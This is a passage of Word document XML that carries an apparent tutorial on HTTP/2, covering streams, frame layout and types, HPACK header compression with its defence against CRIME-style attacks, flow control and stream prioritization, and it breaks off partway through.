    <w:p w14:paraId="5D59E2C1" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:lastRenderedPageBreak/>
        <w:t>HTTP/2 introduces the concept of </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>streams</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> — independent, bidirectional sequences of frames within a single TCP connection. Each stream carries one request-response pair. Multiple streams coexist on the same TCP connection simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5CFF1F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B42F83" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>TCP Connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798F99F7" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve"> Stream 1: GET /index.html </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve"> 200 OK + HTML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15128FCB" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve"> Stream 3: GET /style.css  </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve"> 200 OK + CSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04232A5A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve"> Stream 5: GET /app.js     </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve"> 200 OK + JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541C7CBC" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve"> Stream 7: GET /logo.png   </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve"> 200 OK + PNG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EA216B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  └── Stream 9: POST /api/data  → 200 OK + JSON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28110002" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>All 5 requests are </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>in flight simultaneously</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> over one TCP connection. Responses arrive as their data becomes available — no ordering requirement. The small CSS response arrives before the large JavaScript response finishes, without waiting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3A030D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why streams use odd numbers (client-initiated):</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> HTTP/2 assigns stream IDs with clients using odd numbers (1, 3, 5...) and servers using even numbers for server-push (2, 4, 6...). This prevents ID collision without coordination. Stream 0 is the connection-level control stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F93D7A5" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Frame Structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C4D18C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>All HTTP/2 communication is in </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>frames</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> — fixed-format binary messages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA7C453" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01235D2D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>+-----------------------------------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BA4397" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>|                 Length (24)                   |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BFD332" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>+---------------+---------------+---------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3215F437" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>|   Type (8)    |   Flags (8)   |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F46ADA9" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>+-+-------------+---------------+-------------------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2580F168" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>|R|                 Stream Identifier (31)                      |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB9E16B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>+=+=============================================================+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C09C062" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>|                   Frame Payload (0...)                        |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D262267" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:lastRenderedPageBreak/>
        <w:t>+---------------------------------------------------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B02A919" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Frame types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301E2290" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="823"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>HEADERS (0x1): HTTP headers (request or response). Uses HPACK compression.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F20B92B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="823"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>DATA (0x0): Body data (request or response body).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756C6BB4" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="823"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>SETTINGS (0x4): Connection-level configuration parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6CC45C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="823"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>WINDOW_UPDATE (0x8): Flow control credits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B5F3E1" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="823"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>RST_STREAM (0x3): Cancel a specific stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5A059C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="823"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>GOAWAY (0x7): Gracefully close the connection, specifying the last processed stream ID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419609B6" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="823"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>PUSH_PROMISE (0x5): Server push — server proactively pushes resources the client hasn't requested yet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FF755E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="823"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>PING (0x6): Connection liveness check / RTT measurement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A46605A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="823"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>PRIORITY (0x2): Stream priority declaration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EB484B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="823"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>CONTINUATION (0x9): Continuation of HEADERS frame that didn't fit in one frame.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654138CA" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HPACK Header Compression — Solving HTTP's Header Redundancy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122C8B88" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>HTTP/1.1 headers are sent </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>in full, uncompressed, on every request</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t>. A typical HTTP request has 500–2000 bytes of headers. For a page with 100 requests, that's 50KB–200KB of header overhead — often exceeding the actual content size for small API responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F19455" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>HTTP/2's </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HPACK</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> compression eliminates redundant headers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD455FF" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Static table:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> 61 predefined header name-value pairs with fixed indices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF3FEA9" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7D903B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Index 2:  :method: GET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E13046B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Index 5:  :method: POST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9D66AC" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Index 7:  :scheme: https</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43789A3E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Index 23: content-type: application/json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C21A7D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Index 28: content-length:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257ED859" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:lastRenderedPageBreak/>
        <w:t>A GET request is encoded as a single byte (index 2). Enormous compression for common headers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3E84E2" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Dynamic table:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Per-connection table of previously sent header name-value pairs, built up as the connection progresses. Both client and server maintain synchronized dynamic tables. A header sent on request 1 can be referenced by index on request 2, 3, 4... — one byte instead of the full header string.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7C8E92" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Huffman coding:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> For headers that can't be represented by table references, the literal value is Huffman-encoded using a static Huffman code optimized for HTTP header value character frequencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387640EB" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HPACK security — CRIME/BREACH attacks:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Compression + encryption together can leak information about encrypted content. HPACK mitigates this by using </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>separate compression contexts per direction</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> (request headers and response headers have separate dynamic tables) and by not allowing the body to share the header compression context (unlike SPDY's DEFLATE which was vulnerable to CRIME). Sensitive headers like Cookie can be flagged </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>never-indexed</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> — sent as literal without being added to the dynamic table, preventing compression side-channel attacks on sensitive values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA554F5" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP/2 Flow Control:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B90FD4" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>TCP has its own flow control (TCP window). HTTP/2 adds </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>application-level flow control</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> at both the stream and connection levels — independent of TCP's flow control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A0DCCE" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why application-level flow control:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> A receiver may have buffers for connection-level data but not for a specific stream. Without stream-level flow control, one fast stream could overflow the application's per-stream buffer even though the connection-level buffer has space.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7443ABCB" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WINDOW_UPDATE mechanics:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Each stream and the connection itself starts with a </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>flow control window</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> of 65,535 bytes (configurable via SETTINGS). The sender can only send up to the window size of data without acknowledgment. After the receiver processes data and frees buffer space, it sends a WINDOW_UPDATE frame granting additional credits (window increment). The sender adds the increment to its window and can send more data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632271B2" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B70A9AF" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Initial window: 65535 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2A6741" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B"/>
    <w:p w14:paraId="31C809CC" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Sender sends 65535 bytes → window = 0 → must stop sending</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622CA136" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:lastRenderedPageBreak/>
        <w:t>Receiver processes 32768 bytes → sends WINDOW_UPDATE(32768)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6531871B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Sender window = 32768 → can send 32768 more bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381905A1" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Stream prioritization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F9BDC4" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>HTTP/2 streams have priorities — the client declares how the server should allocate bandwidth when multiple streams are in flight. Priorities are expressed as a </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dependency tree</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> with weights:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F1DE99" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F5579E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Stream 1 (weight 16)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2F1F8B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  └── Stream 3 (weight 12) — depends on Stream 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D9D47E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve"> Stream 5 (weight 4) </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve"> depends on Stream 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B993B4" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">        └── Stream 7 (weight 8) — depends on Stream 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2864477E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
